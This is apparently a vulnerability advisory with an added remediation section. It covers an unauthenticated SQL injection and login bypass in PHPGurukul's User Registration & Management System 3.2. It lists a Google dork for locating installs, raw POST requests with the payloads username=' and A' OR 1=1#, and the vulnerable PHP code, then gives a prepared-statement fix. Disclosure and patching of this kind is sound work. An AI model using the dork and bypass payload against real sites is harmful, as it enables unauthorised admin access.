User Registration & Management System - SQLi [fixed typo]

2024.06.22
Credit: bRpsd
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > User Registration & Management System - SQLi
.:. Google Dorks .:. inurl:loginsystem/index.php
.:. Date: June 18, 2024
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://phpgurukul.com/
.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003
.:. Product Version -> Version 3.2
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

#############
|DESCRIPTION|
#############

"User Management System is a web based technology which manages user database and provides rights to update their details. In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."

===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass
Types: error-based
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]

POST PoC #1: http://tom:8080/loginsystem/admin/index.php
Host: tom
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://tom
Connection: keep-alive
Referer: http://tom/loginsystem/admin/index.php
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a
Upgrade-Insecure-Requests: 1

username='&password=test&login=

Response:
Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9

===========================================================================================
Test #2 => Payload to skip authentication
http://localhost:9000/loginsystem/admin/index.php

username=A' OR 1=1#&password=1&login=

Response: 302 redirect to dashboard.php
===========================================================================================
Vuln File: /loginsystem/admin/index.php
Vul Code:

<?php
session_start();
include_once('../includes/config.php');
// Code for login
if(isset($_POST['login']))
{
$adminusername=$_POST['username'];
$pass=md5($_POST['password']);
$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");
$num=mysqli_fetch_array($ret);
if($num>0)
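The root cause in the snippet above is string concatenation: $_POST['username'] is pasted straight into the SELECT, so a single quote ends the string literal, an OR clause makes the WHERE true, and # comments out the password check (the malformed query in PoC #1 makes mysqli_query() return false, which is why mysqli_fetch_array() emits the warning that also leaks the script's absolute path). A second weakness is the `$num>0` test: $num is the fetched row array, so any matching row passes rather than an explicit row count. The following is an added example, not the vendor's code, showing how the same login block can be written with a mysqli prepared statement so that the username and password hash travel as bound parameters and can never change the SQL text. It assumes the same $con connection from ../includes/config.php, the same `admin` table with `username` and `password` columns, and the md5 storage format of the existing schema; the session key name and the error-message handling are assumptions.

```php
<?php
// Added example (not the vendor's code): hardened replacement for the
// login block in /loginsystem/admin/index.php.
// Assumptions: $con is the mysqli connection from ../includes/config.php,
// table `admin` has `username` and `password` (md5 hex) columns.
session_start();
include_once('../includes/config.php');

if (isset($_POST['login'])) {
    $adminusername = $_POST['username'] ?? '';
    // md5 is kept only because the existing database stores md5 hashes;
    // migrating stored hashes to password_hash()/password_verify() is the
    // longer-term fix and is outside the scope of this SQLi patch.
    $pass = md5($_POST['password'] ?? '');

    // The SQL text is fixed at compile time; the two '?' placeholders are
    // filled by the driver, so a quote, OR or # inside $adminusername is
    // treated as data and cannot alter the query.
    $stmt = mysqli_prepare(
        $con,
        "SELECT * FROM admin WHERE username = ? AND password = ?"
    );
    if ($stmt === false) {
        // Log server-side only: the original code let PHP print a warning
        // (with the absolute path of the script) straight to the client.
        error_log('admin login: prepare failed: ' . mysqli_error($con));
        http_response_code(500);
        exit;
    }

    mysqli_stmt_bind_param($stmt, 'ss', $adminusername, $pass);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_store_result($stmt);

    // Explicit row count instead of comparing a fetched array to 0.
    if (mysqli_stmt_num_rows($stmt) === 1) {
        session_regenerate_id(true);                 // new session id on login
        $_SESSION['alogin'] = $adminusername;        // session key is an assumption
        mysqli_stmt_close($stmt);
        header('Location: dashboard.php');
        exit;
    }

    mysqli_stmt_close($stmt);
    $_SESSION['errmsg'] = 'Invalid username or password';
}
```

With this version the request from Test #2 (`username=A' OR 1=1#`) simply looks up a user literally named `A' OR 1=1#`, finds no row, and falls through to the generic error message; the request from PoC #1 (`username='`) no longer produces a malformed query, so there is no warning to observe. When verifying the fix, confirm that both payloads now yield the same response as a wrong password, and that the web server's error log (not the HTTP response) is where any prepare/execute failures appear.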


Copyright 2024, cxsecurity.com